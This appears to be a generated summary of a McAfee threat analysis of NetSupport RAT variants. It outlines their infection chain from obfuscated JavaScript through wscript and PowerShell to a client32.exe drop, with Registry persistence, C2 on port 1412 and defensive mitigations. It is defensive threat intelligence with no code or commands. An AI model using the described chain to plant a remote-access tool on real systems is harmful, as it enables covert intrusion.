Full Report
NetSupport malware variants have been a persistent threat, demonstrating adaptability and evolving infection techniques. In this technical analysis, we delve... The post Beneath the Surface: How Hackers Turn NetSupport Against Users appeared first on McAfee Blog.
Analysis Summary
# Main Topic
Technical analysis of evolving NetSupport malware variants, focusing on their infection chains, technical intricacies, and methods for establishing persistence and command and control (C2).
## Key Points
- NetSupport variants demonstrate adaptability, evolving distribution via obfuscated JavaScript files as the initial entry point.
- The malware leverages Windows native tools, using `wscript.exe` to invoke PowerShell for subsequent payload delivery.
- The final malicious payload is the NetSupport client binary, `client32.exe`, which establishes remote control.
- **Persistence:** Achieved by creating Windows Registry entries for automatic execution upon system startup.
- **Variant 1 Specifics:** Drops `client32.exe` in the `AppData\MsEdgeSandbox` folder. It utilizes `Start-BitsTransfer` or `bitsadmin` for file downloads.
- **Variant 2 Specifics:** Downloads a text file, decodes base64 content, creates a ZIP archive, and places `client32.exe` in the `AppData\D` folder.
- **C2 Communication:** Established by `client32.exe` using the NetSupport Manager protocol, often communicating on port 1412, as seen using a client version of "NetSupport Manager/1.3".
## Threat Actors
- Not explicitly attributed to a specific named threat actor group, but characterized as cybercriminals continually evolving their attack methods against the NetSupport RAT.
## TTPs
- **Initial Access:** Delivery via obfuscated JavaScript files designed to bypass security mechanisms.
- **Execution:** Chaining execution from JavaScript to `wscript.exe` to PowerShell.
- **Defense Evasion:** Use of native tools (`wscript.exe`, PowerShell, `bitsadmin`) and file obfuscation (Base64 decoding in Variant 2).
- **Persistence:** Registering `client32.exe` for auto-startup via the Windows Registry.
- **Command and Control:** Establishing connection via `client32.exe` to remote addresses using port 1412, characteristic of NetSupport Manager.
## Affected Systems
- Windows operating systems (implied by the use of `wscript.exe`, PowerShell, and AppData directories).
- Systems targeted geographically across the United States and Canada.
## Mitigations
- Focus on robust security software capable of signature-based, machine learning, and behavior-based detection to identify and thwart execution chains involving PowerShell and suspicious file drops.
- Monitor and inspect network traffic for communication on port 1412 associated with NetSupport Manager client headers.
- Implement controls to restrict or monitor execution from JavaScript/WScript environments that attempt to launch PowerShell or download external executables.
## Conclusion
NetSupport variants pose a persistent threat due to their reliance on layered infection techniques starting with highly obfuscated JavaScript. The immediate TTPs involve leveraging native Windows tools for stealthy payload delivery and establishing persistence via the Registry. Organizations must prioritize defense mechanisms that analyze execution chains (JS -> Script Host -> PowerShell) and block known C2 infrastructure associated with the NetSupport Manager RAT.